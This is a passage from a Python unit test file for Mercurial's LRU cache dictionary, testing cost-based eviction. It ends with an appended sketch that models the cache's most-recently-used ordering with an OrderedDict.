        self.assertEqual(d.totalcost, 11)
        self.assertIn('f', d)

        # Inserting a new element will evict the last item since it is
        # too large.
        d['g'] = 'vg'
        self.assertEqual(len(d), 1)
        self.assertEqual(d.totalcost, 0)
        self.assertIn('g', d)

        d.clear()

        d.insert('a', 'va', cost=7)
        d.insert('b', 'vb', cost=3)
        self.assertEqual(len(d), 2)

        # Replacing a value with smaller cost won't result in eviction.
        d.insert('b', 'vb2', cost=2)
        self.assertEqual(len(d), 2)

        # Replacing a value with a higher cost will evict when threshold
        # exceeded.
        d.insert('b', 'vb3', cost=4)
        self.assertEqual(len(d), 1)
        self.assertNotIn('a', d)

    def testmaxcostcomplex(self):
        d = util.lrucachedict(100, maxcost=100)
        d.insert('a', 'va', cost=9)
        d.insert('b', 'vb', cost=21)
        d.insert('c', 'vc', cost=7)
        d.insert('d', 'vc', cost=50)
        self.assertEqual(d.totalcost, 87)

        # Inserting a new element should free multiple elements so we hit
        # the low water mark.
        d.insert('e', 'vd', cost=25)
        self.assertEqual(len(d), 2)
        self.assertNotIn('a', d)
        self.assertNotIn('b', d)
        self.assertNotIn('c', d)
        self.assertIn('d', d)
        self.assertIn('e', d)

if __name__ == '__main__':
    silenttestrunner.main(__name__)
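
# A minimal behavioral model of the ordering rules exercised above (a
# sketch, not Mercurial's implementation -- the real lrucachedict uses a
# doubly linked list of nodes). The point of the testget() addition: get()
# must count as an LRU "touch" just like __getitem__, moving the entry to
# the most-recently-used position.
from collections import OrderedDict

class lrumodel(object):
    def __init__(self, capacity):
        self.capacity = capacity
        self._od = OrderedDict()  # last item = most recently used

    def __setitem__(self, k, v):
        self._od.pop(k, None)
        self._od[k] = v
        while len(self._od) > self.capacity:
            self._od.popitem(last=False)  # evict least recently used

    def get(self, k, default=None):
        if k not in self._od:
            return default
        self._od[k] = self._od.pop(k)  # touch: move to MRU position
        return self._od[k]

    def __iter__(self):
        return reversed(self._od)  # iterate most recently used first

def _lrumodel_demo():
    m = lrumodel(4)
    m['a'] = 'va'
    m['b'] = 'vb'
    m['c'] = 'vc'
    assert m.get('missing') is None
    assert list(m) == ['c', 'b', 'a']
    assert m.get('a') == 'va'
    assert list(m) == ['a', 'c', 'b']  # same ordering testget() asserts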